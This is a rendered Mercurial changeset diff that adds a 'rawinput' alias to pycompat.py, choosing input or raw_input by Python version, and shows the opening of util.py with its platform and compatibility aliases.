##// END OF EJS Templates
py3: select input or raw_input by pycompat...
Yuya Nishihara -
r33853:cfcfbe6c default
parent child Browse files
Show More
@@ -1,461 +1,463 b''
1 # pycompat.py - portability shim for python 3
1 # pycompat.py - portability shim for python 3
2 #
2 #
3 # This software may be used and distributed according to the terms of the
3 # This software may be used and distributed according to the terms of the
4 # GNU General Public License version 2 or any later version.
4 # GNU General Public License version 2 or any later version.
5
5
6 """Mercurial portability shim for python 3.
6 """Mercurial portability shim for python 3.
7
7
8 This contains aliases to hide python version-specific details from the core.
8 This contains aliases to hide python version-specific details from the core.
9 """
9 """
10
10
11 from __future__ import absolute_import
11 from __future__ import absolute_import
12
12
13 import getopt
13 import getopt
14 import os
14 import os
15 import shlex
15 import shlex
16 import sys
16 import sys
17
17
18 ispy3 = (sys.version_info[0] >= 3)
18 ispy3 = (sys.version_info[0] >= 3)
19 ispypy = (r'__pypy__' in sys.builtin_module_names)
19 ispypy = (r'__pypy__' in sys.builtin_module_names)
20
20
21 if not ispy3:
21 if not ispy3:
22 import cookielib
22 import cookielib
23 import cPickle as pickle
23 import cPickle as pickle
24 import httplib
24 import httplib
25 import Queue as _queue
25 import Queue as _queue
26 import SocketServer as socketserver
26 import SocketServer as socketserver
27 import xmlrpclib
27 import xmlrpclib
28 else:
28 else:
29 import http.cookiejar as cookielib
29 import http.cookiejar as cookielib
30 import http.client as httplib
30 import http.client as httplib
31 import pickle
31 import pickle
32 import queue as _queue
32 import queue as _queue
33 import socketserver
33 import socketserver
34 import xmlrpc.client as xmlrpclib
34 import xmlrpc.client as xmlrpclib
35
35
36 empty = _queue.Empty
36 empty = _queue.Empty
37 queue = _queue.Queue
37 queue = _queue.Queue
38
38
39 def identity(a):
39 def identity(a):
40 return a
40 return a
41
41
42 if ispy3:
42 if ispy3:
43 import builtins
43 import builtins
44 import functools
44 import functools
45 import io
45 import io
46 import struct
46 import struct
47
47
48 fsencode = os.fsencode
48 fsencode = os.fsencode
49 fsdecode = os.fsdecode
49 fsdecode = os.fsdecode
50 oslinesep = os.linesep.encode('ascii')
50 oslinesep = os.linesep.encode('ascii')
51 osname = os.name.encode('ascii')
51 osname = os.name.encode('ascii')
52 ospathsep = os.pathsep.encode('ascii')
52 ospathsep = os.pathsep.encode('ascii')
53 ossep = os.sep.encode('ascii')
53 ossep = os.sep.encode('ascii')
54 osaltsep = os.altsep
54 osaltsep = os.altsep
55 if osaltsep:
55 if osaltsep:
56 osaltsep = osaltsep.encode('ascii')
56 osaltsep = osaltsep.encode('ascii')
57 # os.getcwd() on Python 3 returns string, but it has os.getcwdb() which
57 # os.getcwd() on Python 3 returns string, but it has os.getcwdb() which
58 # returns bytes.
58 # returns bytes.
59 getcwd = os.getcwdb
59 getcwd = os.getcwdb
60 sysplatform = sys.platform.encode('ascii')
60 sysplatform = sys.platform.encode('ascii')
61 sysexecutable = sys.executable
61 sysexecutable = sys.executable
62 if sysexecutable:
62 if sysexecutable:
63 sysexecutable = os.fsencode(sysexecutable)
63 sysexecutable = os.fsencode(sysexecutable)
64 stringio = io.BytesIO
64 stringio = io.BytesIO
65 maplist = lambda *args: list(map(*args))
65 maplist = lambda *args: list(map(*args))
66 rawinput = input
66
67
67 # TODO: .buffer might not exist if std streams were replaced; we'll need
68 # TODO: .buffer might not exist if std streams were replaced; we'll need
68 # a silly wrapper to make a bytes stream backed by a unicode one.
69 # a silly wrapper to make a bytes stream backed by a unicode one.
69 stdin = sys.stdin.buffer
70 stdin = sys.stdin.buffer
70 stdout = sys.stdout.buffer
71 stdout = sys.stdout.buffer
71 stderr = sys.stderr.buffer
72 stderr = sys.stderr.buffer
72
73
73 # Since Python 3 converts argv to wchar_t type by Py_DecodeLocale() on Unix,
74 # Since Python 3 converts argv to wchar_t type by Py_DecodeLocale() on Unix,
74 # we can use os.fsencode() to get back bytes argv.
75 # we can use os.fsencode() to get back bytes argv.
75 #
76 #
76 # https://hg.python.org/cpython/file/v3.5.1/Programs/python.c#l55
77 # https://hg.python.org/cpython/file/v3.5.1/Programs/python.c#l55
77 #
78 #
78 # TODO: On Windows, the native argv is wchar_t, so we'll need a different
79 # TODO: On Windows, the native argv is wchar_t, so we'll need a different
79 # workaround to simulate the Python 2 (i.e. ANSI Win32 API) behavior.
80 # workaround to simulate the Python 2 (i.e. ANSI Win32 API) behavior.
80 if getattr(sys, 'argv', None) is not None:
81 if getattr(sys, 'argv', None) is not None:
81 sysargv = list(map(os.fsencode, sys.argv))
82 sysargv = list(map(os.fsencode, sys.argv))
82
83
83 bytechr = struct.Struct('>B').pack
84 bytechr = struct.Struct('>B').pack
84
85
85 class bytestr(bytes):
86 class bytestr(bytes):
86 """A bytes which mostly acts as a Python 2 str
87 """A bytes which mostly acts as a Python 2 str
87
88
88 >>> bytestr(), bytestr(bytearray(b'foo')), bytestr(u'ascii'), bytestr(1)
89 >>> bytestr(), bytestr(bytearray(b'foo')), bytestr(u'ascii'), bytestr(1)
89 (b'', b'foo', b'ascii', b'1')
90 (b'', b'foo', b'ascii', b'1')
90 >>> s = bytestr(b'foo')
91 >>> s = bytestr(b'foo')
91 >>> assert s is bytestr(s)
92 >>> assert s is bytestr(s)
92
93
93 __bytes__() should be called if provided:
94 __bytes__() should be called if provided:
94
95
95 >>> class bytesable(object):
96 >>> class bytesable(object):
96 ... def __bytes__(self):
97 ... def __bytes__(self):
97 ... return b'bytes'
98 ... return b'bytes'
98 >>> bytestr(bytesable())
99 >>> bytestr(bytesable())
99 b'bytes'
100 b'bytes'
100
101
101 There's no implicit conversion from non-ascii str as its encoding is
102 There's no implicit conversion from non-ascii str as its encoding is
102 unknown:
103 unknown:
103
104
104 >>> bytestr(chr(0x80)) # doctest: +ELLIPSIS
105 >>> bytestr(chr(0x80)) # doctest: +ELLIPSIS
105 Traceback (most recent call last):
106 Traceback (most recent call last):
106 ...
107 ...
107 UnicodeEncodeError: ...
108 UnicodeEncodeError: ...
108
109
109 Comparison between bytestr and bytes should work:
110 Comparison between bytestr and bytes should work:
110
111
111 >>> assert bytestr(b'foo') == b'foo'
112 >>> assert bytestr(b'foo') == b'foo'
112 >>> assert b'foo' == bytestr(b'foo')
113 >>> assert b'foo' == bytestr(b'foo')
113 >>> assert b'f' in bytestr(b'foo')
114 >>> assert b'f' in bytestr(b'foo')
114 >>> assert bytestr(b'f') in b'foo'
115 >>> assert bytestr(b'f') in b'foo'
115
116
116 Sliced elements should be bytes, not integer:
117 Sliced elements should be bytes, not integer:
117
118
118 >>> s[1], s[:2]
119 >>> s[1], s[:2]
119 (b'o', b'fo')
120 (b'o', b'fo')
120 >>> list(s), list(reversed(s))
121 >>> list(s), list(reversed(s))
121 ([b'f', b'o', b'o'], [b'o', b'o', b'f'])
122 ([b'f', b'o', b'o'], [b'o', b'o', b'f'])
122
123
123 As bytestr type isn't propagated across operations, you need to cast
124 As bytestr type isn't propagated across operations, you need to cast
124 bytes to bytestr explicitly:
125 bytes to bytestr explicitly:
125
126
126 >>> s = bytestr(b'foo').upper()
127 >>> s = bytestr(b'foo').upper()
127 >>> t = bytestr(s)
128 >>> t = bytestr(s)
128 >>> s[0], t[0]
129 >>> s[0], t[0]
129 (70, b'F')
130 (70, b'F')
130
131
131 Be careful to not pass a bytestr object to a function which expects
132 Be careful to not pass a bytestr object to a function which expects
132 bytearray-like behavior.
133 bytearray-like behavior.
133
134
134 >>> t = bytes(t) # cast to bytes
135 >>> t = bytes(t) # cast to bytes
135 >>> assert type(t) is bytes
136 >>> assert type(t) is bytes
136 """
137 """
137
138
138 def __new__(cls, s=b''):
139 def __new__(cls, s=b''):
139 if isinstance(s, bytestr):
140 if isinstance(s, bytestr):
140 return s
141 return s
141 if (not isinstance(s, (bytes, bytearray))
142 if (not isinstance(s, (bytes, bytearray))
142 and not hasattr(s, u'__bytes__')): # hasattr-py3-only
143 and not hasattr(s, u'__bytes__')): # hasattr-py3-only
143 s = str(s).encode(u'ascii')
144 s = str(s).encode(u'ascii')
144 return bytes.__new__(cls, s)
145 return bytes.__new__(cls, s)
145
146
146 def __getitem__(self, key):
147 def __getitem__(self, key):
147 s = bytes.__getitem__(self, key)
148 s = bytes.__getitem__(self, key)
148 if not isinstance(s, bytes):
149 if not isinstance(s, bytes):
149 s = bytechr(s)
150 s = bytechr(s)
150 return s
151 return s
151
152
152 def __iter__(self):
153 def __iter__(self):
153 return iterbytestr(bytes.__iter__(self))
154 return iterbytestr(bytes.__iter__(self))
154
155
155 def iterbytestr(s):
156 def iterbytestr(s):
156 """Iterate bytes as if it were a str object of Python 2"""
157 """Iterate bytes as if it were a str object of Python 2"""
157 return map(bytechr, s)
158 return map(bytechr, s)
158
159
159 def sysbytes(s):
160 def sysbytes(s):
160 """Convert an internal str (e.g. keyword, __doc__) back to bytes
161 """Convert an internal str (e.g. keyword, __doc__) back to bytes
161
162
162 This never raises UnicodeEncodeError, but only ASCII characters
163 This never raises UnicodeEncodeError, but only ASCII characters
163 can be round-trip by sysstr(sysbytes(s)).
164 can be round-trip by sysstr(sysbytes(s)).
164 """
165 """
165 return s.encode(u'utf-8')
166 return s.encode(u'utf-8')
166
167
167 def sysstr(s):
168 def sysstr(s):
168 """Return a keyword str to be passed to Python functions such as
169 """Return a keyword str to be passed to Python functions such as
169 getattr() and str.encode()
170 getattr() and str.encode()
170
171
171 This never raises UnicodeDecodeError. Non-ascii characters are
172 This never raises UnicodeDecodeError. Non-ascii characters are
172 considered invalid and mapped to arbitrary but unique code points
173 considered invalid and mapped to arbitrary but unique code points
173 such that 'sysstr(a) != sysstr(b)' for all 'a != b'.
174 such that 'sysstr(a) != sysstr(b)' for all 'a != b'.
174 """
175 """
175 if isinstance(s, builtins.str):
176 if isinstance(s, builtins.str):
176 return s
177 return s
177 return s.decode(u'latin-1')
178 return s.decode(u'latin-1')
178
179
179 def strurl(url):
180 def strurl(url):
180 """Converts a bytes url back to str"""
181 """Converts a bytes url back to str"""
181 return url.decode(u'ascii')
182 return url.decode(u'ascii')
182
183
183 def bytesurl(url):
184 def bytesurl(url):
184 """Converts a str url to bytes by encoding in ascii"""
185 """Converts a str url to bytes by encoding in ascii"""
185 return url.encode(u'ascii')
186 return url.encode(u'ascii')
186
187
187 def raisewithtb(exc, tb):
188 def raisewithtb(exc, tb):
188 """Raise exception with the given traceback"""
189 """Raise exception with the given traceback"""
189 raise exc.with_traceback(tb)
190 raise exc.with_traceback(tb)
190
191
191 def getdoc(obj):
192 def getdoc(obj):
192 """Get docstring as bytes; may be None so gettext() won't confuse it
193 """Get docstring as bytes; may be None so gettext() won't confuse it
193 with _('')"""
194 with _('')"""
194 doc = getattr(obj, u'__doc__', None)
195 doc = getattr(obj, u'__doc__', None)
195 if doc is None:
196 if doc is None:
196 return doc
197 return doc
197 return sysbytes(doc)
198 return sysbytes(doc)
198
199
199 def _wrapattrfunc(f):
200 def _wrapattrfunc(f):
200 @functools.wraps(f)
201 @functools.wraps(f)
201 def w(object, name, *args):
202 def w(object, name, *args):
202 return f(object, sysstr(name), *args)
203 return f(object, sysstr(name), *args)
203 return w
204 return w
204
205
205 # these wrappers are automagically imported by hgloader
206 # these wrappers are automagically imported by hgloader
206 delattr = _wrapattrfunc(builtins.delattr)
207 delattr = _wrapattrfunc(builtins.delattr)
207 getattr = _wrapattrfunc(builtins.getattr)
208 getattr = _wrapattrfunc(builtins.getattr)
208 hasattr = _wrapattrfunc(builtins.hasattr)
209 hasattr = _wrapattrfunc(builtins.hasattr)
209 setattr = _wrapattrfunc(builtins.setattr)
210 setattr = _wrapattrfunc(builtins.setattr)
210 xrange = builtins.range
211 xrange = builtins.range
211 unicode = str
212 unicode = str
212
213
213 def open(name, mode='r', buffering=-1):
214 def open(name, mode='r', buffering=-1):
214 return builtins.open(name, sysstr(mode), buffering)
215 return builtins.open(name, sysstr(mode), buffering)
215
216
216 def getoptb(args, shortlist, namelist):
217 def getoptb(args, shortlist, namelist):
217 """
218 """
218 Takes bytes arguments, converts them to unicode, pass them to
219 Takes bytes arguments, converts them to unicode, pass them to
219 getopt.getopt(), convert the returned values back to bytes and then
220 getopt.getopt(), convert the returned values back to bytes and then
220 return them for Python 3 compatibility as getopt.getopt() don't accepts
221 return them for Python 3 compatibility as getopt.getopt() don't accepts
221 bytes on Python 3.
222 bytes on Python 3.
222 """
223 """
223 args = [a.decode('latin-1') for a in args]
224 args = [a.decode('latin-1') for a in args]
224 shortlist = shortlist.decode('latin-1')
225 shortlist = shortlist.decode('latin-1')
225 namelist = [a.decode('latin-1') for a in namelist]
226 namelist = [a.decode('latin-1') for a in namelist]
226 opts, args = getopt.getopt(args, shortlist, namelist)
227 opts, args = getopt.getopt(args, shortlist, namelist)
227 opts = [(a[0].encode('latin-1'), a[1].encode('latin-1'))
228 opts = [(a[0].encode('latin-1'), a[1].encode('latin-1'))
228 for a in opts]
229 for a in opts]
229 args = [a.encode('latin-1') for a in args]
230 args = [a.encode('latin-1') for a in args]
230 return opts, args
231 return opts, args
231
232
232 def strkwargs(dic):
233 def strkwargs(dic):
233 """
234 """
234 Converts the keys of a python dictonary to str i.e. unicodes so that
235 Converts the keys of a python dictonary to str i.e. unicodes so that
235 they can be passed as keyword arguments as dictonaries with bytes keys
236 they can be passed as keyword arguments as dictonaries with bytes keys
236 can't be passed as keyword arguments to functions on Python 3.
237 can't be passed as keyword arguments to functions on Python 3.
237 """
238 """
238 dic = dict((k.decode('latin-1'), v) for k, v in dic.iteritems())
239 dic = dict((k.decode('latin-1'), v) for k, v in dic.iteritems())
239 return dic
240 return dic
240
241
241 def byteskwargs(dic):
242 def byteskwargs(dic):
242 """
243 """
243 Converts keys of python dictonaries to bytes as they were converted to
244 Converts keys of python dictonaries to bytes as they were converted to
244 str to pass that dictonary as a keyword argument on Python 3.
245 str to pass that dictonary as a keyword argument on Python 3.
245 """
246 """
246 dic = dict((k.encode('latin-1'), v) for k, v in dic.iteritems())
247 dic = dict((k.encode('latin-1'), v) for k, v in dic.iteritems())
247 return dic
248 return dic
248
249
249 # TODO: handle shlex.shlex().
250 # TODO: handle shlex.shlex().
250 def shlexsplit(s):
251 def shlexsplit(s):
251 """
252 """
252 Takes bytes argument, convert it to str i.e. unicodes, pass that into
253 Takes bytes argument, convert it to str i.e. unicodes, pass that into
253 shlex.split(), convert the returned value to bytes and return that for
254 shlex.split(), convert the returned value to bytes and return that for
254 Python 3 compatibility as shelx.split() don't accept bytes on Python 3.
255 Python 3 compatibility as shelx.split() don't accept bytes on Python 3.
255 """
256 """
256 ret = shlex.split(s.decode('latin-1'))
257 ret = shlex.split(s.decode('latin-1'))
257 return [a.encode('latin-1') for a in ret]
258 return [a.encode('latin-1') for a in ret]
258
259
259 else:
260 else:
260 import cStringIO
261 import cStringIO
261
262
262 bytechr = chr
263 bytechr = chr
263 bytestr = str
264 bytestr = str
264 iterbytestr = iter
265 iterbytestr = iter
265 sysbytes = identity
266 sysbytes = identity
266 sysstr = identity
267 sysstr = identity
267 strurl = identity
268 strurl = identity
268 bytesurl = identity
269 bytesurl = identity
269
270
270 # this can't be parsed on Python 3
271 # this can't be parsed on Python 3
271 exec('def raisewithtb(exc, tb):\n'
272 exec('def raisewithtb(exc, tb):\n'
272 ' raise exc, None, tb\n')
273 ' raise exc, None, tb\n')
273
274
274 def fsencode(filename):
275 def fsencode(filename):
275 """
276 """
276 Partial backport from os.py in Python 3, which only accepts bytes.
277 Partial backport from os.py in Python 3, which only accepts bytes.
277 In Python 2, our paths should only ever be bytes, a unicode path
278 In Python 2, our paths should only ever be bytes, a unicode path
278 indicates a bug.
279 indicates a bug.
279 """
280 """
280 if isinstance(filename, str):
281 if isinstance(filename, str):
281 return filename
282 return filename
282 else:
283 else:
283 raise TypeError(
284 raise TypeError(
284 "expect str, not %s" % type(filename).__name__)
285 "expect str, not %s" % type(filename).__name__)
285
286
286 # In Python 2, fsdecode() has a very chance to receive bytes. So it's
287 # In Python 2, fsdecode() has a very chance to receive bytes. So it's
287 # better not to touch Python 2 part as it's already working fine.
288 # better not to touch Python 2 part as it's already working fine.
288 fsdecode = identity
289 fsdecode = identity
289
290
290 def getdoc(obj):
291 def getdoc(obj):
291 return getattr(obj, '__doc__', None)
292 return getattr(obj, '__doc__', None)
292
293
293 def getoptb(args, shortlist, namelist):
294 def getoptb(args, shortlist, namelist):
294 return getopt.getopt(args, shortlist, namelist)
295 return getopt.getopt(args, shortlist, namelist)
295
296
296 strkwargs = identity
297 strkwargs = identity
297 byteskwargs = identity
298 byteskwargs = identity
298
299
299 oslinesep = os.linesep
300 oslinesep = os.linesep
300 osname = os.name
301 osname = os.name
301 ospathsep = os.pathsep
302 ospathsep = os.pathsep
302 ossep = os.sep
303 ossep = os.sep
303 osaltsep = os.altsep
304 osaltsep = os.altsep
304 stdin = sys.stdin
305 stdin = sys.stdin
305 stdout = sys.stdout
306 stdout = sys.stdout
306 stderr = sys.stderr
307 stderr = sys.stderr
307 if getattr(sys, 'argv', None) is not None:
308 if getattr(sys, 'argv', None) is not None:
308 sysargv = sys.argv
309 sysargv = sys.argv
309 sysplatform = sys.platform
310 sysplatform = sys.platform
310 getcwd = os.getcwd
311 getcwd = os.getcwd
311 sysexecutable = sys.executable
312 sysexecutable = sys.executable
312 shlexsplit = shlex.split
313 shlexsplit = shlex.split
313 stringio = cStringIO.StringIO
314 stringio = cStringIO.StringIO
314 maplist = map
315 maplist = map
316 rawinput = raw_input
315
317
316 class _pycompatstub(object):
318 class _pycompatstub(object):
317 def __init__(self):
319 def __init__(self):
318 self._aliases = {}
320 self._aliases = {}
319
321
320 def _registeraliases(self, origin, items):
322 def _registeraliases(self, origin, items):
321 """Add items that will be populated at the first access"""
323 """Add items that will be populated at the first access"""
322 items = map(sysstr, items)
324 items = map(sysstr, items)
323 self._aliases.update(
325 self._aliases.update(
324 (item.replace(sysstr('_'), sysstr('')).lower(), (origin, item))
326 (item.replace(sysstr('_'), sysstr('')).lower(), (origin, item))
325 for item in items)
327 for item in items)
326
328
327 def _registeralias(self, origin, attr, name):
329 def _registeralias(self, origin, attr, name):
328 """Alias ``origin``.``attr`` as ``name``"""
330 """Alias ``origin``.``attr`` as ``name``"""
329 self._aliases[sysstr(name)] = (origin, sysstr(attr))
331 self._aliases[sysstr(name)] = (origin, sysstr(attr))
330
332
331 def __getattr__(self, name):
333 def __getattr__(self, name):
332 try:
334 try:
333 origin, item = self._aliases[name]
335 origin, item = self._aliases[name]
334 except KeyError:
336 except KeyError:
335 raise AttributeError(name)
337 raise AttributeError(name)
336 self.__dict__[name] = obj = getattr(origin, item)
338 self.__dict__[name] = obj = getattr(origin, item)
337 return obj
339 return obj
338
340
339 httpserver = _pycompatstub()
341 httpserver = _pycompatstub()
340 urlreq = _pycompatstub()
342 urlreq = _pycompatstub()
341 urlerr = _pycompatstub()
343 urlerr = _pycompatstub()
342 if not ispy3:
344 if not ispy3:
343 import BaseHTTPServer
345 import BaseHTTPServer
344 import CGIHTTPServer
346 import CGIHTTPServer
345 import SimpleHTTPServer
347 import SimpleHTTPServer
346 import urllib2
348 import urllib2
347 import urllib
349 import urllib
348 import urlparse
350 import urlparse
349 urlreq._registeraliases(urllib, (
351 urlreq._registeraliases(urllib, (
350 "addclosehook",
352 "addclosehook",
351 "addinfourl",
353 "addinfourl",
352 "ftpwrapper",
354 "ftpwrapper",
353 "pathname2url",
355 "pathname2url",
354 "quote",
356 "quote",
355 "splitattr",
357 "splitattr",
356 "splitpasswd",
358 "splitpasswd",
357 "splitport",
359 "splitport",
358 "splituser",
360 "splituser",
359 "unquote",
361 "unquote",
360 "url2pathname",
362 "url2pathname",
361 "urlencode",
363 "urlencode",
362 ))
364 ))
363 urlreq._registeraliases(urllib2, (
365 urlreq._registeraliases(urllib2, (
364 "AbstractHTTPHandler",
366 "AbstractHTTPHandler",
365 "BaseHandler",
367 "BaseHandler",
366 "build_opener",
368 "build_opener",
367 "FileHandler",
369 "FileHandler",
368 "FTPHandler",
370 "FTPHandler",
369 "HTTPBasicAuthHandler",
371 "HTTPBasicAuthHandler",
370 "HTTPDigestAuthHandler",
372 "HTTPDigestAuthHandler",
371 "HTTPHandler",
373 "HTTPHandler",
372 "HTTPPasswordMgrWithDefaultRealm",
374 "HTTPPasswordMgrWithDefaultRealm",
373 "HTTPSHandler",
375 "HTTPSHandler",
374 "install_opener",
376 "install_opener",
375 "ProxyHandler",
377 "ProxyHandler",
376 "Request",
378 "Request",
377 "urlopen",
379 "urlopen",
378 ))
380 ))
379 urlreq._registeraliases(urlparse, (
381 urlreq._registeraliases(urlparse, (
380 "urlparse",
382 "urlparse",
381 "urlunparse",
383 "urlunparse",
382 ))
384 ))
383 urlerr._registeraliases(urllib2, (
385 urlerr._registeraliases(urllib2, (
384 "HTTPError",
386 "HTTPError",
385 "URLError",
387 "URLError",
386 ))
388 ))
387 httpserver._registeraliases(BaseHTTPServer, (
389 httpserver._registeraliases(BaseHTTPServer, (
388 "HTTPServer",
390 "HTTPServer",
389 "BaseHTTPRequestHandler",
391 "BaseHTTPRequestHandler",
390 ))
392 ))
391 httpserver._registeraliases(SimpleHTTPServer, (
393 httpserver._registeraliases(SimpleHTTPServer, (
392 "SimpleHTTPRequestHandler",
394 "SimpleHTTPRequestHandler",
393 ))
395 ))
394 httpserver._registeraliases(CGIHTTPServer, (
396 httpserver._registeraliases(CGIHTTPServer, (
395 "CGIHTTPRequestHandler",
397 "CGIHTTPRequestHandler",
396 ))
398 ))
397
399
398 else:
400 else:
399 import urllib.parse
401 import urllib.parse
400 urlreq._registeraliases(urllib.parse, (
402 urlreq._registeraliases(urllib.parse, (
401 "splitattr",
403 "splitattr",
402 "splitpasswd",
404 "splitpasswd",
403 "splitport",
405 "splitport",
404 "splituser",
406 "splituser",
405 "urlparse",
407 "urlparse",
406 "urlunparse",
408 "urlunparse",
407 ))
409 ))
408 urlreq._registeralias(urllib.parse, "unquote_to_bytes", "unquote")
410 urlreq._registeralias(urllib.parse, "unquote_to_bytes", "unquote")
409 import urllib.request
411 import urllib.request
410 urlreq._registeraliases(urllib.request, (
412 urlreq._registeraliases(urllib.request, (
411 "AbstractHTTPHandler",
413 "AbstractHTTPHandler",
412 "BaseHandler",
414 "BaseHandler",
413 "build_opener",
415 "build_opener",
414 "FileHandler",
416 "FileHandler",
415 "FTPHandler",
417 "FTPHandler",
416 "ftpwrapper",
418 "ftpwrapper",
417 "HTTPHandler",
419 "HTTPHandler",
418 "HTTPSHandler",
420 "HTTPSHandler",
419 "install_opener",
421 "install_opener",
420 "pathname2url",
422 "pathname2url",
421 "HTTPBasicAuthHandler",
423 "HTTPBasicAuthHandler",
422 "HTTPDigestAuthHandler",
424 "HTTPDigestAuthHandler",
423 "HTTPPasswordMgrWithDefaultRealm",
425 "HTTPPasswordMgrWithDefaultRealm",
424 "ProxyHandler",
426 "ProxyHandler",
425 "Request",
427 "Request",
426 "url2pathname",
428 "url2pathname",
427 "urlopen",
429 "urlopen",
428 ))
430 ))
429 import urllib.response
431 import urllib.response
430 urlreq._registeraliases(urllib.response, (
432 urlreq._registeraliases(urllib.response, (
431 "addclosehook",
433 "addclosehook",
432 "addinfourl",
434 "addinfourl",
433 ))
435 ))
434 import urllib.error
436 import urllib.error
435 urlerr._registeraliases(urllib.error, (
437 urlerr._registeraliases(urllib.error, (
436 "HTTPError",
438 "HTTPError",
437 "URLError",
439 "URLError",
438 ))
440 ))
439 import http.server
441 import http.server
440 httpserver._registeraliases(http.server, (
442 httpserver._registeraliases(http.server, (
441 "HTTPServer",
443 "HTTPServer",
442 "BaseHTTPRequestHandler",
444 "BaseHTTPRequestHandler",
443 "SimpleHTTPRequestHandler",
445 "SimpleHTTPRequestHandler",
444 "CGIHTTPRequestHandler",
446 "CGIHTTPRequestHandler",
445 ))
447 ))
446
448
447 # urllib.parse.quote() accepts both str and bytes, decodes bytes
449 # urllib.parse.quote() accepts both str and bytes, decodes bytes
448 # (if necessary), and returns str. This is wonky. We provide a custom
450 # (if necessary), and returns str. This is wonky. We provide a custom
449 # implementation that only accepts bytes and emits bytes.
451 # implementation that only accepts bytes and emits bytes.
450 def quote(s, safe=r'/'):
452 def quote(s, safe=r'/'):
451 s = urllib.parse.quote_from_bytes(s, safe=safe)
453 s = urllib.parse.quote_from_bytes(s, safe=safe)
452 return s.encode('ascii', 'strict')
454 return s.encode('ascii', 'strict')
453
455
454 # urllib.parse.urlencode() returns str. We use this function to make
456 # urllib.parse.urlencode() returns str. We use this function to make
455 # sure we return bytes.
457 # sure we return bytes.
456 def urlencode(query, doseq=False):
458 def urlencode(query, doseq=False):
457 s = urllib.parse.urlencode(query, doseq=doseq)
459 s = urllib.parse.urlencode(query, doseq=doseq)
458 return s.encode('ascii')
460 return s.encode('ascii')
459
461
460 urlreq.quote = quote
462 urlreq.quote = quote
461 urlreq.urlencode = urlencode
463 urlreq.urlencode = urlencode
@@ -1,3776 +1,3773 b''
1 # util.py - Mercurial utility functions and platform specific implementations
1 # util.py - Mercurial utility functions and platform specific implementations
2 #
2 #
3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 #
6 #
7 # This software may be used and distributed according to the terms of the
7 # This software may be used and distributed according to the terms of the
8 # GNU General Public License version 2 or any later version.
8 # GNU General Public License version 2 or any later version.
9
9
10 """Mercurial utility functions and platform specific implementations.
10 """Mercurial utility functions and platform specific implementations.
11
11
12 This contains helper routines that are independent of the SCM core and
12 This contains helper routines that are independent of the SCM core and
13 hide platform-specific details from the core.
13 hide platform-specific details from the core.
14 """
14 """
15
15
16 from __future__ import absolute_import
16 from __future__ import absolute_import
17
17
18 import abc
18 import abc
19 import bz2
19 import bz2
20 import calendar
20 import calendar
21 import codecs
21 import codecs
22 import collections
22 import collections
23 import contextlib
23 import contextlib
24 import datetime
24 import datetime
25 import errno
25 import errno
26 import gc
26 import gc
27 import hashlib
27 import hashlib
28 import imp
28 import imp
29 import os
29 import os
30 import platform as pyplatform
30 import platform as pyplatform
31 import re as remod
31 import re as remod
32 import shutil
32 import shutil
33 import signal
33 import signal
34 import socket
34 import socket
35 import stat
35 import stat
36 import string
36 import string
37 import subprocess
37 import subprocess
38 import sys
38 import sys
39 import tempfile
39 import tempfile
40 import textwrap
40 import textwrap
41 import time
41 import time
42 import traceback
42 import traceback
43 import warnings
43 import warnings
44 import zlib
44 import zlib
45
45
46 from . import (
46 from . import (
47 encoding,
47 encoding,
48 error,
48 error,
49 i18n,
49 i18n,
50 policy,
50 policy,
51 pycompat,
51 pycompat,
52 )
52 )
53
53
54 base85 = policy.importmod(r'base85')
54 base85 = policy.importmod(r'base85')
55 osutil = policy.importmod(r'osutil')
55 osutil = policy.importmod(r'osutil')
56 parsers = policy.importmod(r'parsers')
56 parsers = policy.importmod(r'parsers')
57
57
58 b85decode = base85.b85decode
58 b85decode = base85.b85decode
59 b85encode = base85.b85encode
59 b85encode = base85.b85encode
60
60
61 cookielib = pycompat.cookielib
61 cookielib = pycompat.cookielib
62 empty = pycompat.empty
62 empty = pycompat.empty
63 httplib = pycompat.httplib
63 httplib = pycompat.httplib
64 httpserver = pycompat.httpserver
64 httpserver = pycompat.httpserver
65 pickle = pycompat.pickle
65 pickle = pycompat.pickle
66 queue = pycompat.queue
66 queue = pycompat.queue
67 socketserver = pycompat.socketserver
67 socketserver = pycompat.socketserver
68 stderr = pycompat.stderr
68 stderr = pycompat.stderr
69 stdin = pycompat.stdin
69 stdin = pycompat.stdin
70 stdout = pycompat.stdout
70 stdout = pycompat.stdout
71 stringio = pycompat.stringio
71 stringio = pycompat.stringio
72 urlerr = pycompat.urlerr
72 urlerr = pycompat.urlerr
73 urlreq = pycompat.urlreq
73 urlreq = pycompat.urlreq
74 xmlrpclib = pycompat.xmlrpclib
74 xmlrpclib = pycompat.xmlrpclib
75
75
76 # workaround for win32mbcs
76 # workaround for win32mbcs
77 _filenamebytestr = pycompat.bytestr
77 _filenamebytestr = pycompat.bytestr
78
78
79 def isatty(fp):
79 def isatty(fp):
80 try:
80 try:
81 return fp.isatty()
81 return fp.isatty()
82 except AttributeError:
82 except AttributeError:
83 return False
83 return False
84
84
85 # glibc determines buffering on first write to stdout - if we replace a TTY
85 # glibc determines buffering on first write to stdout - if we replace a TTY
86 # destined stdout with a pipe destined stdout (e.g. pager), we want line
86 # destined stdout with a pipe destined stdout (e.g. pager), we want line
87 # buffering
87 # buffering
88 if isatty(stdout):
88 if isatty(stdout):
89 stdout = os.fdopen(stdout.fileno(), pycompat.sysstr('wb'), 1)
89 stdout = os.fdopen(stdout.fileno(), pycompat.sysstr('wb'), 1)
90
90
91 if pycompat.osname == 'nt':
91 if pycompat.osname == 'nt':
92 from . import windows as platform
92 from . import windows as platform
93 stdout = platform.winstdout(stdout)
93 stdout = platform.winstdout(stdout)
94 else:
94 else:
95 from . import posix as platform
95 from . import posix as platform
96
96
97 _ = i18n._
97 _ = i18n._
98
98
99 bindunixsocket = platform.bindunixsocket
99 bindunixsocket = platform.bindunixsocket
100 cachestat = platform.cachestat
100 cachestat = platform.cachestat
101 checkexec = platform.checkexec
101 checkexec = platform.checkexec
102 checklink = platform.checklink
102 checklink = platform.checklink
103 copymode = platform.copymode
103 copymode = platform.copymode
104 executablepath = platform.executablepath
104 executablepath = platform.executablepath
105 expandglobs = platform.expandglobs
105 expandglobs = platform.expandglobs
106 explainexit = platform.explainexit
106 explainexit = platform.explainexit
107 findexe = platform.findexe
107 findexe = platform.findexe
